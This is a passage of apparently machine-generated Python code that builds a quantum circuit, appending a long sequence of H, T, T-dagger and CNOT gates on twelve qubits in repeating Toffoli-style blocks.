k.gate('cnot',[11,3])
k.gate('h',[8])
k.gate('h',[11])
k.gate('t',[2])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,2])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('tdag',[10])
k.gate('cnot',[2,10])
k.gate('tdag',[2])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('cnot',[10,2])
k.gate('h',[11])
k.gate('h',[10])
k.gate('t',[0])
k.gate('t',[1])
k.gate('t',[10])
k.gate('cnot',[1,0])
k.gate('cnot',[10,1])
k.gate('cnot',[0,10])
k.gate('tdag',[1])
k.gate('cnot',[0,1])
k.gate('tdag',[0])
k.gate('tdag',[1])
k.gate('t',[10])
k.gate('cnot',[10,1])
k.gate('cnot',[0,10])
k.gate('cnot',[1,0])
k.gate('h',[10])
k.gate('h',[11])
k.gate('t',[2])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,2])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('tdag',[10])
k.gate('cnot',[2,10])
k.gate('tdag',[2])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('cnot',[10,2])
k.gate('h',[11])
k.gate('h',[8])
k.gate('t',[3])
k.gate('t',[11])
k.gate('t',[8])
k.gate('cnot',[11,3])
k.gate('cnot',[8,11])
k.gate('cnot',[3,8])
k.gate('tdag',[11])
k.gate('cnot',[3,11])
k.gate('tdag',[3])
k.gate('tdag',[11])
k.gate('t',[8])
k.gate('cnot',[8,11])
k.gate('cnot',[3,8])
k.gate('cnot',[11,3])
k.gate('h',[8])
k.gate('h',[11])
k.gate('t',[2])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,2])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('tdag',[10])
k.gate('cnot',[2,10])
k.gate('tdag',[2])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('cnot',[10,2])
k.gate('h',[11])
k.gate('h',[10])
k.gate('t',[0])
k.gate('t',[1])
k.gate('t',[10])
k.gate('cnot',[1,0])
k.gate('cnot',[10,1])
k.gate('cnot',[0,10])
k.gate('tdag',[1])
k.gate('cnot',[0,1])
k.gate('tdag',[0])
k.gate('tdag',[1])
k.gate('t',[10])
k.gate('cnot',[10,1])
k.gate('cnot',[0,10])
k.gate('cnot',[1,0])
k.gate('h',[10])
k.gate('h',[11])
k.gate('t',[2])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,2])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('tdag',[10])
k.gate('cnot',[2,10])
k.gate('tdag',[2])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('cnot',[10,2])
k.gate('h',[11])
k.gate('h',[7])
k.gate('t',[8])
k.gate('t',[11])
k.gate('t',[7])
k.gate('cnot',[11,8])
k.gate('cnot',[7,11])
k.gate('cnot',[8,7])
k.gate('tdag',[11])
k.gate('cnot',[8,11])
k.gate('tdag',[8])
k.gate('tdag',[11])
k.gate('t',[7])
k.gate('cnot',[7,11])
k.gate('cnot',[8,7])
k.gate('cnot',[11,8])
k.gate('h',[7])
k.gate('h',[11])
k.gate('t',[10])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,10])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('tdag',[9])
k.gate('cnot',[10,9])
k.gate('tdag',[10])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('cnot',[9,10])
k.gate('h',[11])
k.gate('h',[9])
k.gate('t',[6])
k.gate('t',[3])
k.gate('t',[9])
k.gate('cnot',[3,6])
k.gate('cnot',[9,3])
k.gate('cnot',[6,9])
k.gate('tdag',[3])
k.gate('cnot',[6,3])
k.gate('tdag',[6])
k.gate('tdag',[3])
k.gate('t',[9])
k.gate('cnot',[9,3])
k.gate('cnot',[6,9])
k.gate('cnot',[3,6])
k.gate('h',[9])
k.gate('h',[3])
k.gate('t',[4])
k.gate('t',[5])
k.gate('t',[3])
k.gate('cnot',[5,4])
k.gate('cnot',[3,5])
k.gate('cnot',[4,3])
k.gate('tdag',[5])
k.gate('cnot',[4,5])
k.gate('tdag',[4])
k.gate('tdag',[5])
k.gate('t',[3])
k.gate('cnot',[3,5])
k.gate('cnot',[4,3])
k.gate('cnot',[5,4])
k.gate('h',[3])
k.gate('h',[9])
k.gate('t',[6])
k.gate('t',[3])
k.gate('t',[9])
k.gate('cnot',[3,6])
k.gate('cnot',[9,3])
k.gate('cnot',[6,9])
k.gate('tdag',[3])
k.gate('cnot',[6,3])
k.gate('tdag',[6])
k.gate('tdag',[3])
k.gate('t',[9])
k.gate('cnot',[9,3])
k.gate('cnot',[6,9])
k.gate('cnot',[3,6])
k.gate('h',[9])
k.gate('h',[11])
k.gate('t',[10])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,10])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('tdag',[9])
k.gate('cnot',[10,9])
k.gate('tdag',[10])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('cnot',[9,10])
k.gate('h',[11])
k.gate('h',[7])
k.gate('t',[8])
k.gate('t',[11])
k.gate('t',[7])
k.gate('cnot',[11,8])
k.gate('cnot',[7,11])
k.gate('cnot',[8,7])
k.gate('tdag',[11])
k.gate('cnot',[8,11])
k.gate('tdag',[8])
k.gate('tdag',[11])
k.gate('t',[7])
k.gate('cnot',[7,11])
k.gate('cnot',[8,7])
k.gate('cnot',[11,8])
k.gate('h',[7])
k.gate('h',[11])
k.gate('t',[10])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,10])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('tdag',[9])
k.gate('cnot',[10,9])
k.gate('tdag',[10])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('cnot',[9,10])
k.gate('h',[11])
k.gate('h',[9])
k.gate('t',[6])
k.gate('t',[3])
k.gate('t',[9])
k.gate('cnot',[3,6])
k.gate('cnot',[9,3])
k.gate('cnot',[6,9])
k.gate('tdag',[3])
k.gate('cnot',[6,3])
k.gate('tdag',[6])
k.gate('tdag',[3])
k.gate('t',[9])
k.gate('cnot',[9,3])
k.gate('cnot',[6,9])
k.gate('cnot',[3,6])
k.gate('h',[9])
k.gate('h',[3])
k.gate('t',[4])
k.gate('t',[5])
k.gate('t',[3])
k.gate('cnot',[5,4])
k.gate('cnot',[3,5])
k.gate('cnot',[4,3])
k.gate('tdag',[5])
k.gate('cnot',[4,5])
k.gate('tdag',[4])
k.gate('tdag',[5])
k.gate('t',[3])
k.gate('cnot',[3,5])
k.gate('cnot',[4,3])
k.gate('cnot',[5,4])
k.gate('h',[3])
k.gate('h',[9])
k.gate('t',[6])
k.gate('t',[3])
k.gate('t',[9])
k.gate('cnot',[3,6])
k.gate('cnot',[9,3])
k.gate('cnot',[6,9])
k.gate('tdag',[3])
k.gate('cnot',[6,3])
k.gate('tdag',[6])
k.gate('tdag',[3])
k.gate('t',[9])
k.gate('cnot',[9,3])
k.gate('cnot',[6,9])
k.gate('cnot',[3,6])
k.gate('h',[9])
k.gate('h',[11])
k.gate('t',[10])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,10])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('tdag',[9])
k.gate('cnot',[10,9])
k.gate('tdag',[10])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('cnot',[9,10])
k.gate('h',[11])
k.gate('h',[7])
k.gate('t',[2])
k.gate('t',[11])
k.gate('t',[7])
k.gate('cnot',[11,2])
k.gate('cnot',[7,11])
k.gate('cnot',[2,7])
k.gate('tdag',[11])
k.gate('cnot',[2,11])
k.gate('tdag',[2])
k.gate('tdag',[11])
k.gate('t',[7])
k.gate('cnot',[7,11])
k.gate('cnot',[2,7])
k.gate('cnot',[11,2])
k.gate('h',[7])
k.gate('h',[11])
k.gate('t',[0])
k.gate('t',[1])
k.gate('t',[11])
k.gate('cnot',[1,0])
k.gate('cnot',[11,1])
k.gate('cnot',[0,11])
k.gate('tdag',[1])
k.gate('cnot',[0,1])
k.gate('tdag',[0])
k.gate('tdag',[1])
k.gate('t',[11])
k.gate('cnot',[11,1])
k.gate('cnot',[0,11])
k.gate('cnot',[1,0])
k.gate('h',[11])
k.gate('h',[7])
k.gate('t',[2])
k.gate('t',[11])
k.gate('t',[7])
k.gate('cnot',[11,2])
k.gate('cnot',[7,11])
k.gate('cnot',[2,7])
k.gate('tdag',[11])
k.gate('cnot',[2,11])
k.gate('tdag',[2])
k.gate('tdag',[11])
k.gate('t',[7])
k.gate('cnot',[7,11])
k.gate('cnot',[2,7])
k.gate('cnot',[11,2])
k.gate('h',[7])
k.gate('h',[11])
k.gate('t',[0])
k.gate('t',[1])
k.gate('t',[11])
k.gate('cnot',[1,0])
k.gate('cnot',[11,1])
k.gate('cnot',[0,11])
k.gate('tdag',[1])
k.gate('cnot',[0,1])
k.gate('tdag',[0])
k.gate('tdag',[1])
k.gate('t',[11])
k.gate('cnot',[11,1])
k.gate('cnot',[0,11])
k.gate('cnot',[1,0])
k.gate('h',[11])
k.gate('h',[6])
k.gate('t',[7])
k.gate('t',[11])
k.gate('t',[6])
k.gate('cnot',[11,7])
k.gate('cnot',[6,11])
k.gate('cnot',[7,6])
k.gate('tdag',[11])
k.gate('cnot',[7,11])
k.gate('tdag',[7])
k.gate('tdag',[11])
k.gate('t',[6])
k.gate('cnot',[6,11])
k.gate('cnot',[7,6])
k.gate('cnot',[11,7])
k.gate('h',[6])
k.gate('h',[11])
k.gate('t',[10])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,10])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('tdag',[9])
k.gate('cnot',[10,9])
k.gate('tdag',[10])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('cnot',[9,10])
k.gate('h',[11])
k.gate('h',[9])
k.gate('t',[5])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,5])
k.gate('cnot',[9,8])
k.gate('cnot',[5,9])
k.gate('tdag',[8])
k.gate('cnot',[5,8])
k.gate('tdag',[5])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[5,9])
k.gate('cnot',[8,5])
k.gate('h',[9])
k.gate('h',[8])
k.gate('t',[3])
k.gate('t',[4])
k.gate('t',[8])
k.gate('cnot',[4,3])
k.gate('cnot',[8,4])
k.gate('cnot',[3,8])
k.gate('tdag',[4])
k.gate('cnot',[3,4])
k.gate('tdag',[3])
k.gate('tdag',[4])
k.gate('t',[8])
k.gate('cnot',[8,4])
k.gate('cnot',[3,8])
k.gate('cnot',[4,3])
k.gate('h',[8])
k.gate('h',[9])
k.gate('t',[5])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,5])
k.gate('cnot',[9,8])
k.gate('cnot',[5,9])
k.gate('tdag',[8])
k.gate('cnot',[5,8])
k.gate('tdag',[5])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[5,9])
k.gate('cnot',[8,5])
k.gate('h',[9])
k.gate('h',[11])
k.gate('t',[10])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,10])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('tdag',[9])
k.gate('cnot',[10,9])
k.gate('tdag',[10])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('cnot',[9,10])
k.gate('h',[11])
k.gate('h',[6])
k.gate('t',[7])
k.gate('t',[11])
k.gate('t',[6])
k.gate('cnot',[11,7])
k.gate('cnot',[6,11])
k.gate('cnot',[7,6])
k.gate('tdag',[11])
k.gate('cnot',[7,11])
k.gate('tdag',[7])
k.gate('tdag',[11])
k.gate('t',[6])
k.gate('cnot',[6,11])
k.gate('cnot',[7,6])
k.gate('cnot',[11,7])
k.gate('h',[6])
k.gate('h',[11])
k.gate('t',[10])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,10])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('tdag',[9])
k.gate('cnot',[10,9])
k.gate('tdag',[10])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('cnot',[9,10])
k.gate('h',[11])
k.gate('h',[9])
k.gate('t',[5])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,5])
k.gate('cnot',[9,8])
k.gate('cnot',[5,9])
k.gate('tdag',[8])
k.gate('cnot',[5,8])
k.gate('tdag',[5])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[5,9])
k.gate('cnot',[8,5])
k.gate('h',[9])
k.gate('h',[8])
k.gate('t',[3])
k.gate('t',[4])
k.gate('t',[8])
k.gate('cnot',[4,3])
k.gate('cnot',[8,4])
k.gate('cnot',[3,8])
k.gate('tdag',[4])
k.gate('cnot',[3,4])
k.gate('tdag',[3])
k.gate('tdag',[4])
k.gate('t',[8])
k.gate('cnot',[8,4])
k.gate('cnot',[3,8])
k.gate('cnot',[4,3])
k.gate('h',[8])
k.gate('h',[9])
k.gate('t',[5])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,5])
k.gate('cnot',[9,8])
k.gate('cnot',[5,9])
k.gate('tdag',[8])
k.gate('cnot',[5,8])
k.gate('tdag',[5])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[5,9])
k.gate('cnot',[8,5])
k.gate('h',[9])
k.gate('h',[11])
k.gate('t',[10])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,10])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('tdag',[9])
k.gate('cnot',[10,9])
k.gate('tdag',[10])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('cnot',[9,10])
k.gate('h',[11])
k.gate('h',[7])
k.gate('t',[2])
k.gate('t',[11])
k.gate('t',[7])
k.gate('cnot',[11,2])
k.gate('cnot',[7,11])
k.gate('cnot',[2,7])
k.gate('tdag',[11])
k.gate('cnot',[2,11])
k.gate('tdag',[2])
k.gate('tdag',[11])
k.gate('t',[7])
k.gate('cnot',[7,11])
k.gate('cnot',[2,7])
k.gate('cnot',[11,2])
k.gate('h',[7])
k.gate('h',[11])
k.gate('t',[0])
k.gate('t',[1])
k.gate('t',[11])
k.gate('cnot',[1,0])
k.gate('cnot',[11,1])
k.gate('cnot',[0,11])
k.gate('tdag',[1])
k.gate('cnot',[0,1])
k.gate('tdag',[0])
k.gate('tdag',[1])
k.gate('t',[11])
k.gate('cnot',[11,1])
k.gate('cnot',[0,11])
k.gate('cnot',[1,0])
k.gate('h',[11])
k.gate('h',[7])
k.gate('t',[2])
k.gate('t',[11])
k.gate('t',[7])
k.gate('cnot',[11,2])
k.gate('cnot',[7,11])
k.gate('cnot',[2,7])
k.gate('tdag',[11])
k.gate('cnot',[2,11])
k.gate('tdag',[2])
k.gate('tdag',[11])
k.gate('t',[7])
k.gate('cnot',[7,11])
k.gate('cnot',[2,7])
k.gate('cnot',[11,2])
k.gate('h',[7])
k.gate('h',[11])
k.gate('t',[0])
k.gate('t',[1])
k.gate('t',[11])
k.gate('cnot',[1,0])
k.gate('cnot',[11,1])
k.gate('cnot',[0,11])
k.gate('tdag',[1])
k.gate('cnot',[0,1])
k.gate('tdag',[0])
k.gate('tdag',[1])
k.gate('t',[11])
k.gate('cnot',[11,1])
k.gate('cnot',[0,11])
k.gate('cnot',[1,0])
k.gate('h',[11])
k.gate('h',[6])
k.gate('t',[7])
k.gate('t',[11])
k.gate('t',[6])
k.gate('cnot',[11,7])
k.gate('cnot',[6,11])
k.gate('cnot',[7,6])
k.gate('tdag',[11])
k.gate('cnot',[7,11])
k.gate('tdag',[7])
k.gate('tdag',[11])
k.gate('t',[6])
k.gate('cnot',[6,11])
k.gate('cnot',[7,6])
k.gate('cnot',[11,7])
k.gate('h',[6])
k.gate('h',[11])
k.gate('t',[10])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,10])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('tdag',[9])
k.gate('cnot',[10,9])
k.gate('tdag',[10])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('cnot',[9,10])
k.gate('h',[11])
k.gate('h',[9])
k.gate('t',[5])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,5])
k.gate('cnot',[9,8])
k.gate('cnot',[5,9])
k.gate('tdag',[8])
k.gate('cnot',[5,8])
k.gate('tdag',[5])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[5,9])
k.gate('cnot',[8,5])
k.gate('h',[9])
k.gate('h',[8])
k.gate('t',[3])
k.gate('t',[4])
k.gate('t',[8])
k.gate('cnot',[4,3])
k.gate('cnot',[8,4])
k.gate('cnot',[3,8])
k.gate('tdag',[4])
k.gate('cnot',[3,4])
k.gate('tdag',[3])
k.gate('tdag',[4])
k.gate('t',[8])
k.gate('cnot',[8,4])
k.gate('cnot',[3,8])
k.gate('cnot',[4,3])
k.gate('h',[8])
k.gate('h',[9])
k.gate('t',[5])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,5])
k.gate('cnot',[9,8])
k.gate('cnot',[5,9])
k.gate('tdag',[8])
k.gate('cnot',[5,8])
k.gate('tdag',[5])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[5,9])
k.gate('cnot',[8,5])
k.gate('h',[9])
k.gate('h',[11])
k.gate('t',[10])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,10])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('tdag',[9])
k.gate('cnot',[10,9])
k.gate('tdag',[10])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('cnot',[9,10])
k.gate('h',[11])
k.gate('h',[6])
k.gate('t',[7])
k.gate('t',[11])
k.gate('t',[6])
k.gate('cnot',[11,7])
k.gate('cnot',[6,11])
k.gate('cnot',[7,6])
k.gate('tdag',[11])
k.gate('cnot',[7,11])
k.gate('tdag',[7])
k.gate('tdag',[11])
k.gate('t',[6])
k.gate('cnot',[6,11])
k.gate('cnot',[7,6])
k.gate('cnot',[11,7])
k.gate('h',[6])
k.gate('h',[11])
k.gate('t',[10])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,10])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('tdag',[9])
k.gate('cnot',[10,9])
k.gate('tdag',[10])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('cnot',[9,10])
k.gate('h',[11])
k.gate('h',[9])
k.gate('t',[5])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,5])
k.gate('cnot',[9,8])
k.gate('cnot',[5,9])
k.gate('tdag',[8])
k.gate('cnot',[5,8])
k.gate('tdag',[5])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[5,9])
k.gate('cnot',[8,5])
k.gate('h',[9])
k.gate('h',[8])
k.gate('t',[3])
k.gate('t',[4])
k.gate('t',[8])
k.gate('cnot',[4,3])
k.gate('cnot',[8,4])
k.gate('cnot',[3,8])
k.gate('tdag',[4])
k.gate('cnot',[3,4])
k.gate('tdag',[3])
k.gate('tdag',[4])
k.gate('t',[8])
k.gate('cnot',[8,4])
k.gate('cnot',[3,8])
k.gate('cnot',[4,3])
k.gate('h',[8])
k.gate('h',[9])
k.gate('t',[5])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,5])
k.gate('cnot',[9,8])
k.gate('cnot',[5,9])
k.gate('tdag',[8])
k.gate('cnot',[5,8])
k.gate('tdag',[5])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[5,9])
k.gate('cnot',[8,5])
k.gate('h',[9])
k.gate('h',[11])
k.gate('t',[10])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,10])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('tdag',[9])
k.gate('cnot',[10,9])
k.gate('tdag',[10])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('cnot',[9,10])
k.gate('h',[11])
k.gate('h',[5])
k.gate('t',[10])
k.gate('t',[11])
k.gate('t',[5])
k.gate('cnot',[11,10])
k.gate('cnot',[5,11])
k.gate('cnot',[10,5])
k.gate('tdag',[11])
k.gate('cnot',[10,11])
k.gate('tdag',[10])
k.gate('tdag',[11])
k.gate('t',[5])
k.gate('cnot',[5,11])
k.gate('cnot',[10,5])
k.gate('cnot',[11,10])
k.gate('h',[5])
k.gate('h',[11])
k.gate('t',[4])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,4])
k.gate('cnot',[11,9])
k.gate('cnot',[4,11])
k.gate('tdag',[9])
k.gate('cnot',[4,9])
k.gate('tdag',[4])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[4,11])
k.gate('cnot',[9,4])
k.gate('h',[11])
k.gate('h',[9])
k.gate('t',[3])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,3])
k.gate('cnot',[9,8])
k.gate('cnot',[3,9])
k.gate('tdag',[8])
k.gate('cnot',[3,8])
k.gate('tdag',[3])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[3,9])
k.gate('cnot',[8,3])
k.gate('h',[9])
k.gate('h',[8])
k.gate('t',[2])
k.gate('t',[7])
k.gate('t',[8])
k.gate('cnot',[7,2])
k.gate('cnot',[8,7])
k.gate('cnot',[2,8])
k.gate('tdag',[7])
k.gate('cnot',[2,7])
k.gate('tdag',[2])
k.gate('tdag',[7])
k.gate('t',[8])
k.gate('cnot',[8,7])
k.gate('cnot',[2,8])
k.gate('cnot',[7,2])
k.gate('h',[8])
k.gate('h',[7])
k.gate('t',[0])
k.gate('t',[1])
k.gate('t',[7])
k.gate('cnot',[1,0])
k.gate('cnot',[7,1])
k.gate('cnot',[0,7])
k.gate('tdag',[1])
k.gate('cnot',[0,1])
k.gate('tdag',[0])
k.gate('tdag',[1])
k.gate('t',[7])
k.gate('cnot',[7,1])
k.gate('cnot',[0,7])
k.gate('cnot',[1,0])
k.gate('h',[7])
k.gate('h',[8])
k.gate('t',[2])
k.gate('t',[7])
k.gate('t',[8])
k.gate('cnot',[7,2])
k.gate('cnot',[8,7])
k.gate('cnot',[2,8])
k.gate('tdag',[7])
k.gate('cnot',[2,7])
k.gate('tdag',[2])
k.gate('tdag',[7])
k.gate('t',[8])
k.gate('cnot',[8,7])
k.gate('cnot',[2,8])
k.gate('cnot',[7,2])
k.gate('h',[8])
k.gate('h',[9])
k.gate('t',[3])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,3])
k.gate('cnot',[9,8])
k.gate('cnot',[3,9])
k.gate('tdag',[8])
k.gate('cnot',[3,8])
k.gate('tdag',[3])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[3,9])
k.gate('cnot',[8,3])
k.gate('h',[9])
k.gate('h',[11])
k.gate('t',[4])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,4])
k.gate('cnot',[11,9])
k.gate('cnot',[4,11])
k.gate('tdag',[9])
k.gate('cnot',[4,9])
k.gate('tdag',[4])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[4,11])
k.gate('cnot',[9,4])
k.gate('h',[11])
k.gate('h',[5])
k.gate('t',[10])
k.gate('t',[11])
k.gate('t',[5])
k.gate('cnot',[11,10])
k.gate('cnot',[5,11])
k.gate('cnot',[10,5])
k.gate('tdag',[11])
k.gate('cnot',[10,11])
k.gate('tdag',[10])
k.gate('tdag',[11])
k.gate('t',[5])
k.gate('cnot',[5,11])
k.gate('cnot',[10,5])
k.gate('cnot',[11,10])
k.gate('h',[5])
k.gate('h',[11])
k.gate('t',[4])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,4])
k.gate('cnot',[11,9])
k.gate('cnot',[4,11])
k.gate('tdag',[9])
k.gate('cnot',[4,9])
k.gate('tdag',[4])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[4,11])
k.gate('cnot',[9,4])
k.gate('h',[11])
k.gate('h',[9])
k.gate('t',[3])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,3])
k.gate('cnot',[9,8])
k.gate('cnot',[3,9])
k.gate('tdag',[8])
k.gate('cnot',[3,8])
k.gate('tdag',[3])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[3,9])
k.gate('cnot',[8,3])
k.gate('h',[9])
k.gate('h',[8])
k.gate('t',[2])
k.gate('t',[7])
k.gate('t',[8])
k.gate('cnot',[7,2])
k.gate('cnot',[8,7])
k.gate('cnot',[2,8])
k.gate('tdag',[7])
k.gate('cnot',[2,7])
k.gate('tdag',[2])
k.gate('tdag',[7])
k.gate('t',[8])
k.gate('cnot',[8,7])
k.gate('cnot',[2,8])
k.gate('cnot',[7,2])
k.gate('h',[8])
k.gate('h',[7])
k.gate('t',[0])
k.gate('t',[1])
k.gate('t',[7])
k.gate('cnot',[1,0])
k.gate('cnot',[7,1])
k.gate('cnot',[0,7])
k.gate('tdag',[1])
k.gate('cnot',[0,1])
k.gate('tdag',[0])
k.gate('tdag',[1])
k.gate('t',[7])
k.gate('cnot',[7,1])
k.gate('cnot',[0,7])
k.gate('cnot',[1,0])
k.gate('h',[7])
k.gate('h',[8])
k.gate('t',[2])
k.gate('t',[7])
k.gate('t',[8])
k.gate('cnot',[7,2])
k.gate('cnot',[8,7])
k.gate('cnot',[2,8])
k.gate('tdag',[7])
k.gate('cnot',[2,7])
k.gate('tdag',[2])
k.gate('tdag',[7])
k.gate('t',[8])
k.gate('cnot',[8,7])
k.gate('cnot',[2,8])
k.gate('cnot',[7,2])
k.gate('h',[8])
k.gate('h',[9])
k.gate('t',[3])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,3])
k.gate('cnot',[9,8])
k.gate('cnot',[3,9])
k.gate('tdag',[8])
k.gate('cnot',[3,8])
k.gate('tdag',[3])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[3,9])
k.gate('cnot',[8,3])
k.gate('h',[9])
k.gate('h',[11])
k.gate('t',[4])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,4])
k.gate('cnot',[11,9])
k.gate('cnot',[4,11])
k.gate('tdag',[9])
k.gate('cnot',[4,9])
k.gate('tdag',[4])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[4,11])
k.gate('cnot',[9,4])
k.gate('h',[11])
k.gate('h',[4])
k.gate('t',[10])
k.gate('t',[11])
k.gate('t',[4])
k.gate('cnot',[11,10])
k.gate('cnot',[4,11])
k.gate('cnot',[10,4])
k.gate('tdag',[11])
k.gate('cnot',[10,11])
k.gate('tdag',[10])
k.gate('tdag',[11])
k.gate('t',[4])
k.gate('cnot',[4,11])
k.gate('cnot',[10,4])
k.gate('cnot',[11,10])
k.gate('h',[4])
k.gate('h',[11])
k.gate('t',[3])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,3])
k.gate('cnot',[11,9])
k.gate('cnot',[3,11])
k.gate('tdag',[9])
k.gate('cnot',[3,9])
k.gate('tdag',[3])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[3,11])
k.gate('cnot',[9,3])
k.gate('h',[11])
k.gate('h',[9])
k.gate('t',[2])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,2])
k.gate('cnot',[9,8])
k.gate('cnot',[2,9])
k.gate('tdag',[8])
k.gate('cnot',[2,8])
k.gate('tdag',[2])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[2,9])
k.gate('cnot',[8,2])
k.gate('h',[9])
k.gate('h',[8])
k.gate('t',[0])
k.gate('t',[1])
k.gate('t',[8])
k.gate('cnot',[1,0])
k.gate('cnot',[8,1])
k.gate('cnot',[0,8])
k.gate('tdag',[1])
k.gate('cnot',[0,1])
k.gate('tdag',[0])
k.gate('tdag',[1])
k.gate('t',[8])
k.gate('cnot',[8,1])
k.gate('cnot',[0,8])
k.gate('cnot',[1,0])
k.gate('h',[8])
k.gate('h',[9])
k.gate('t',[2])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,2])
